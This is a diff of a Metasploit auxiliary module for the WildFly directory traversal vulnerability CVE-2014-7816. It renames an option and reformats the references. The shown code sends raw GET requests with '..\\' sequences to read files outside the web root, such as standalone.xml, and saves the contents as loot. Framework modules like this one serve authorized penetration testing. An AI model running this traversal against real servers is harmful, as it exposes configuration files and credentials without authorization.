@@ -20,10 +20,10 @@ def initialize(info = {})
20
20
} ,
21
21
'References' =>
22
22
[
23
- [ 'CVE' , '2014-7816' ] ,
24
- [ 'URL' , 'https://access.redhat.com/security/cve/CVE-2014-7816' ] ,
25
- [ 'URL' , 'https://www.conviso.com.br/advisories/CONVISO-14-001.txt' ] ,
26
- [ 'URL' , 'http://www.openwall.com/lists/oss-security/2014/11/27/4' ]
23
+ [ 'CVE' , '2014-7816' ] ,
24
+ [ 'URL' , 'https://access.redhat.com/security/cve/CVE-2014-7816' ] ,
25
+ [ 'URL' , 'https://www.conviso.com.br/advisories/CONVISO-14-001.txt' ] ,
26
+ [ 'URL' , 'http://www.openwall.com/lists/oss-security/2014/11/27/4' ]
27
27
] ,
28
28
'Author' => 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ,
29
29
'License' => MSF_LICENSE ,
@@ -33,23 +33,23 @@ def initialize(info = {})
33
33
register_options (
34
34
[
35
35
Opt ::RPORT ( 8080 ) ,
36
- OptString . new ( "FILEPATH" , [ true , 'Full path to the file to read' , 'standalone\\configuration\\standalone.xml' ] ) ,
36
+ OptString . new ( 'RELATIVE_FILE_PATH' , [ true , 'Relative path to the file to read' , 'standalone\\configuration\\standalone.xml' ] ) ,
37
37
OptInt . new ( 'TRAVERSAL_DEPTH' , [ true , 'Traversal depth' , 1 ] )
38
38
] , self . class )
39
39
end
40
40
41
41
def run_host ( ip )
42
- print_status ( "#{ peer } - Attempting to download: #{ datastore [ 'FILEPATH ' ] } " )
42
+ print_status ( "#{ peer } - Attempting to download: #{ datastore [ 'RELATIVE_FILE_PATH ' ] } " )
43
43
44
44
traversal = "..\\ " * datastore [ 'TRAVERSAL_DEPTH' ]
45
45
res = send_request_raw ( {
46
46
'method' => 'GET' ,
47
- 'uri' => "/#{ traversal } \\ #{ datastore [ 'FILEPATH ' ] } "
47
+ 'uri' => "/#{ traversal } \\ #{ datastore [ 'RELATIVE_FILE_PATH ' ] } "
48
48
} )
49
49
50
50
if res && res . code == 200
51
51
vprint_line ( res . to_s )
52
- fname = File . basename ( datastore [ 'FILEPATH ' ] )
52
+ fname = File . basename ( datastore [ 'RELATIVE_FILE_PATH ' ] )
53
53
54
54
path = store_loot (
55
55
'wildfly.http' ,
0 commit comments